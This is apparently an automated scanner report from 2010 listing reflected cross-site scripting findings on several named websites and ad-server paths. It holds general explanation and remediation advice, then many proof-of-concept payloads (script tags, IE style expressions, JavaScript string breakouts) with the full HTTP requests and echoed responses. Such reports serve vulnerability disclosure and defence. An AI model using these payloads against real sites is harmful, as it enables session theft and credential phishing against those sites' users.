Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba90b"><script>alert(1)</script>399f5ca35a6 was submitted in the REST URL parameter 1. This input was echoed as ba90b\"><script>alert(1)</script>399f5ca35a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Styleba90b"><script>alert(1)</script>399f5ca35a6/Examples/011/firstcss.htm HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:41 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20244
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Styleba90b\"><script>alert(1)</script>399f5ca35a6/Examples/011/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900a9"><script>alert(1)</script>a0ee9672307 was submitted in the REST URL parameter 2. This input was echoed as 900a9\"><script>alert(1)</script>a0ee9672307 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples900a9"><script>alert(1)</script>a0ee9672307/011/firstcss.htm HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:44 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples900a9\"><script>alert(1)</script>a0ee9672307/011/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9707c"><script>alert(1)</script>83b5b1325cf was submitted in the REST URL parameter 3. This input was echoed as 9707c\"><script>alert(1)</script>83b5b1325cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples/0119707c"><script>alert(1)</script>83b5b1325cf/firstcss.htm HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:48 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:48 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20284
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples/0119707c\"><script>alert(1)</script>83b5b1325cf/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0f95"><script>alert(1)</script>9a6842d9882 was submitted in the REST URL parameter 4. This input was echoed as c0f95\"><script>alert(1)</script>9a6842d9882 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples/011/firstcss.htmc0f95"><script>alert(1)</script>9a6842d9882 HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:51 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples/011/firstcss.htmc0f95\"><script>alert(1)</script>9a6842d9882" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb1d"><script>alert(1)</script>6d3d1243481 was submitted in the REST URL parameter 1. This input was echoed as 6bb1d\"><script>alert(1)</script>6d3d1243481 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TR6bb1d"><script>alert(1)</script>6d3d1243481/NOTE-datetime.html HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:39 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/TR6bb1d\"><script>alert(1)</script>6d3d1243481/NOTE-datetime.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6256"><script>alert(1)</script>2998f915a26 was submitted in the REST URL parameter 2. This input was echoed as c6256\"><script>alert(1)</script>2998f915a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TR/NOTE-datetime.htmlc6256"><script>alert(1)</script>2998f915a26 HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:42 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/TR/NOTE-datetime.htmlc6256\"><script>alert(1)</script>2998f915a26" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31867"><script>alert(1)</script>4b249a12222 was submitted in the REST URL parameter 1. This input was echoed as 31867\"><script>alert(1)</script>4b249a12222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML31867"><script>alert(1)</script>4b249a12222/1999/XML-in-10-points.html HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:40 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML31867\"><script>alert(1)</script>4b249a12222/1999/XML-in-10-points.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6d"><script>alert(1)</script>2c50f42130c was submitted in the REST URL parameter 2. This input was echoed as 81e6d\"><script>alert(1)</script>2c50f42130c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML/199981e6d"><script>alert(1)</script>2c50f42130c/XML-in-10-points.html HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:43 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML/199981e6d\"><script>alert(1)</script>2c50f42130c/XML-in-10-points.html" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b45"><script>alert(1)</script>45d23ad5054 was submitted in the REST URL parameter 3. This input was echoed as 74b45\"><script>alert(1)</script>45d23ad5054 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML/1999/XML-in-10-points.html74b45"><script>alert(1)</script>45d23ad5054 HTTP/1.1 Host: 1c-bible.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:47 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://1c-bible.ru/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML/1999/XML-in-10-points.html74b45\"><script>alert(1)</script>45d23ad5054" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff504"><script>alert(1)</script>51db95ae606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /actaff504"><script>alert(1)</script>51db95ae606/compare HTTP/1.1 Host: action.ffii.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c93b"><script>alert(1)</script>392b2a79c7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /acta/compare4c93b"><script>alert(1)</script>392b2a79c7b?action=diff&rev2=3&rev1=1 HTTP/1.1 Host: action.ffii.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 22:41:13 GMT Server: Apache/2.2.3 (Debian) mod_auth_pgsql/2.0.3 PHP/5.2.0-8+etch16 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_wsgi/2.3 Python/2.4.4 mod_perl/2.0.2 Perl/v5.8.8 Vary: Cookie,User-Agent,Accept-Language Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <meta name="robots" content= ...[SNIP]... <a href="https://action.ffii.org/acta/compare4c93b"><script>alert(1)</script>392b2a79c7b?action=login" id="login" rel="nofollow"> ...[SNIP]...
1.12. http://ad-g.vulnerable.ad.partner/adi/com.ythome/_default [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad-g.doubleclick.net
Path:
/adi/com.ythome/_default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc762"style%3d"x%3aexpression(alert(1))"4e4dcd5c97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc762"style="x:expression(alert(1))"4e4dcd5c97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/com.ythome/_default?fc762"style%3d"x%3aexpression(alert(1))"4e4dcd5c97b=1 HTTP/1.1 Host: ad-g.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 454 Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.vulnerable.ad.partner; expires=Mon, 15 Nov 2010 22:59:32 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:32 GMT Expires: Mon, 15 Nov 2010 22:44:32 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-g.vulnerable.ad.partner/click;h=v8/3a53/0/0/%2a/y;44306;0-0;0;18708550;4307-300/250;0/0/0;;~okv=;fc762"style="x:expression(alert(1))"4e4dcd5c97b=1;~aopt=2/0/cab5/0;~sscs=%3f"> ...[SNIP]...
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a379e"style%3d"x%3aexpression(alert(1))"7d45e6dd180 was submitted in the sz parameter. This input was echoed as a379e"style="x:expression(alert(1))"7d45e6dd180 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/com.ythome/_default;sz=a379e"style%3d"x%3aexpression(alert(1))"7d45e6dd180 HTTP/1.1 Host: ad-g.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 455 Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.vulnerable.ad.partner; expires=Mon, 15 Nov 2010 22:59:34 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:34 GMT Expires: Mon, 15 Nov 2010 22:44:34 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-g.vulnerable.ad.partner/click;h=v8/3a53/0/0/%2a/y;44306;0-0;0;18708550;4307-300/250;0/0/0;;~okv=;sz=a379e"style="x:expression(alert(1))"7d45e6dd180;~aopt=2/0/cab5/0;~sscs=%3f"> ...[SNIP]...
1.14. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/mainpage_p33_powerswitch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/ostg.slashdot/mainpage_p33_powerswitch
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2ddb'-alert(1)-'e19697e144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/mainpage_p33_powerswitch?b2ddb'-alert(1)-'e19697e144=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 321 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:33 GMT Expires: Mon, 15 Nov 2010 22:44:33 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb49'%3balert(1)//5a716dffc22 was submitted in the pg parameter. This input was echoed as 8bb49';alert(1)//5a716dffc22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/mainpage_p33_powerswitch;pg=index2;logged_in=0;tile=8bb49'%3balert(1)//5a716dffc22 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 347 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:33 GMT Expires: Mon, 15 Nov 2010 22:44:33 GMT Connection: close
1.16. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/pg_index_p31_lower_poll_spons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/ostg.slashdot/pg_index_p31_lower_poll_spons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28832'-alert(1)-'39ba68b3ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_index_p31_lower_poll_spons?28832'-alert(1)-'39ba68b3ce=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 461 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:33 GMT Expires: Mon, 15 Nov 2010 22:44:33 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a51e4'%3balert(1)//812492194e2 was submitted in the pg parameter. This input was echoed as a51e4';alert(1)//812492194e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_index_p31_lower_poll_spons;pg=index;logged_in=0;tile=a51e4'%3balert(1)//812492194e2 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 486 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:33 GMT Expires: Mon, 15 Nov 2010 22:44:33 GMT Connection: close
1.18. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d4c'%3balert(1)//899dc5589c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9d4c';alert(1)//899dc5589c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top;pg=search;logged_in=0;dcopt=ist;tile=&e9d4c'%3balert(1)//899dc5589c2=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 360 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:41 GMT Expires: Mon, 15 Nov 2010 22:44:41 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bc0'%3balert(1)//8195cbfb545 was submitted in the pg parameter. This input was echoed as c7bc0';alert(1)//8195cbfb545 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top;pg=search;logged_in=0;dcopt=ist;tile=c7bc0'%3balert(1)//8195cbfb545 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 357 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:41 GMT Expires: Mon, 15 Nov 2010 22:44:41 GMT Connection: close
1.20. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/polls_p1_leader [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/ostg.slashdot/polls_p1_leader
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee523'%3balert(1)//83e6f3379d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee523';alert(1)//83e6f3379d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p1_leader;pg=pollBooth;logged_in=0;dcopt=ist;tile=&ee523'%3balert(1)//83e6f3379d6=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 509 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT Connection: close
